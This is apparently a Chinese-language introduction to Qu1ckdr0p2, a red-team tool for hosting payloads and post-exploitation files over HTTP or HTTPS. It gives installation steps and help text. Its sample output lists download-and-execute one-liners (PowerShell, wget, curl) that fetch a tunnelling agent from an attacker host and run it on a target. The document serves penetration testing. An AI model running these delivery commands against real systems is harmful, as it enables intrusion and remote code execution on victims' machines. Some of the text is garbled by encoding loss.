Qu1ckdr0p2是一款功能强大的文件托管工具,在该工具的帮助下,广大研究人员可以快速通过HTTP或HTTPS托管包括Payload和后渗透代码在内的任何文件。
Qu1ckdr0p2提供了别名和搜索功能,相关功能模块位于qu1ckdr0p2-tools库中。默认配置下,使用--https选项时该工具将生成一个自签名证书,,当Web服务器运行时,tun0接口会被优先使用,否则它将使用eth0接口。
common.ini文件中定义了--search和-u选项中需要使用的映射别名。
当网络服务器运行时,屏幕上会打印出几个下载地址,广大研究人员可以直接复制和粘贴使用。
注意:当前版本的Qu1ckdr0p2仅支持通过pip工具进行安装,如果你直接将该项目源码克隆至本地的话,可能会出现一些意外问题。
首先,我们需要在本地设备上安装并配置好Python 3环境。接下来,直接使用pip3工具安装Qu1ckdr0p2:
pip3 install qu1ckdr0p2 ? echo "alias serv='~/.local/bin/serv'" >> ~/.zshrc source ~/.zshrc
或者:
echo "alias serv='~/.local/bin/serv'" >> ~/.bashrc source ~/.bashrc ? serv init --update
在当前工作目录下托管一个单独的文件:
$ serv serve -f implant.bin --https 443
$ serv serve -f file.example --http 8080
工具更新和帮助信息:
$ serv --help ??????????? Usage: serv [OPTIONS] COMMAND [ARGS]... ? ??Welcome to qu1ckdr0p2 entry point. ? Options: ??--debug ?启用调试模式 ??--help ??显示工具帮助信息和退出 ? Commands: ??init ???执行更新 ??serve ?托管文件
$ serv serve --help Usage: serv serve [OPTIONS] ? ??Serve files. ? Options: ??-l, --list ???????????查看别名 ??-s, --search TEXT ??搜索别名 ??-u, --use INTEGER ?使用动态数字作为别名 ??-f, --file FILE ???????托管一个文件 ??--http INTEGER ????使用HTTP+自定义端口 ??--https INTEGER ???使用HTTPS+自定义端口 ??-h, --help ?????????显示帮助信息和退出
$ serv init --help ?????? Usage: serv init [OPTIONS] ? ??Perform updates. ? Options: ??--update ???????????检查并下载缺失的工具组件 ??--update-self ???????使用pip更新工具 ??--update-self-test ???使用开发测试,将安装不稳定的工具组件 ??--help ??????????????显示帮助信息和退出
工具更新命令:
$ serv init --update
$ serv init --update-self
-u选项要设置的映射别名数字是动态的,因此我们不需要记住指定的数字或输入工具名称:
$ serv serve --search ligolo ?????????????? ? [→] Path: ~/.qu1ckdr0p2/windows/agent.exe [→] Alias: ligolo_agent_win [→] Use: 1 ? [→] Path: ~/.qu1ckdr0p2/windows/proxy.exe [→] Alias: ligolo_proxy_win [→] Use: 2 ? [→] Path: ~/.qu1ckdr0p2/linux/agent [→] Alias: ligolo_agent_linux [→] Use: 3 ? [→] Path: ~/.qu1ckdr0p2/linux/proxy [→] Alias: ligolo_proxy_linux [→] Use: 4 (...)
$ serv serve --search ligolo -u 3 --http 80 ? [→] Serving: ../../.qu1ckdr0p2/linux/agent [→] Protocol: http [→] IP address: 192.168.1.5 [→] Port: 80 [→] Interface: eth0 [→] CTRL+C to quit ? [→] URL: http://192.168.1.5:80/agent ? [↓] csharp: $webclient = New-Object System.Net.WebClient; $webclient.DownloadFile('http://192.168.1.5:80/agent', 'c:\windows\temp\agent'); Start-Process 'c:\windows\temp\agent' ? [↓] wget: wget http://192.168.1.5:80/agent -O /tmp/agent && chmod +x /tmp/agent && /tmp/agent ? [↓] curl: curl http://192.168.1.5:80/agent -o /tmp/agent && chmod +x /tmp/agent && /tmp/agent ? [↓] powershell: Invoke-WebRequest -Uri http://192.168.1.5:80/agent -OutFile c:\windows\temp\agent; Start-Process c:\windows\temp\agent ? ? Web server running
本项目的开发与发布遵循MIT开源许可证协议。
Qu1ckdr0p2:【GitHub传送门】
GitHub - byinarie/qu1ckdr0p2-tools: Red Team / Pentest tooling used in Qu1ckdr0p2